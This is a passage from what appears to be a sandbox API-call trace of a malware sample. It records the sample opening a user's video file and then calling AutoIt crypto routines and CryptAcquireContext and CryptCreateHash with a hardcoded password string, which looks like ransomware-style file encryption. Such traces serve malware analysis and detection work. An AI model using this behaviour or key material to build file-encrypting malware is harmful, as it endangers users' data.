Flags=0x0, Size=0x4) returned 0x43e2650 [0100.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.414] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0100.414] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca580, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0100.414] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0100.415] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0100.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0100.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0100.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0100.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0100.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0100.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0100.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0100.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0100.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0100.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0100.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0100.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0100.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0100.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0100.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.415] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0100.415] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\wJA95KXdyH.flv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\wja95kxdyh.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0100.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0100.415] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0100.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0100.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0100.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0100.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0100.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0100.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0100.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0100.416] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0100.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0100.416] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0100.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0100.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0100.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431de60 [0100.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0100.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0100.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0100.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0100.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0100.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0100.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0100.417] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0100.417] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0100.418] FreeLibrary (hLibModule=0x772d0000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0100.418] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0100.419] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0100.419] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0100.420] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0100.420] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca040 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0100.420] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431de60 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0100.421] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0100.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0100.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0100.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0100.422] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.422] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca0a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0100.422] CloseHandle (hObject=0x258) returned 1 [0100.422] FreeLibrary (hLibModule=0x772d0000) returned 1 [0100.422] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0100.422] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\wJA95KXdyH.flv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d4304b0, ftCreationTime.dwHighDateTime=0x1d5ead7, ftLastAccessTime.dwLowDateTime=0xed3a4300, ftLastAccessTime.dwHighDateTime=0x1d5e933, ftLastWriteTime.dwLowDateTime=0xed3a4300, ftLastWriteTime.dwHighDateTime=0x1d5e933, nFileSizeHigh=0x0, nFileSizeLow=0x400f, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="wJA95KXdyH.flv", cAlternateFileName="WJA95K~1.FLV")) returned 0x41ac280 [0100.423] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0100.423] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0100.423] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.423] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0100.471] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0100.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796ea8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0100.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796d68, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0100.471] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0100.472] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0100.472] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0100.472] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0100.472] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0100.472] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0100.472] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0100.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0100.472] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0100.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0100.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca760, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0100.473] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0100.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0100.473] WideCharToMultiByte (in: CodePage=0x0, 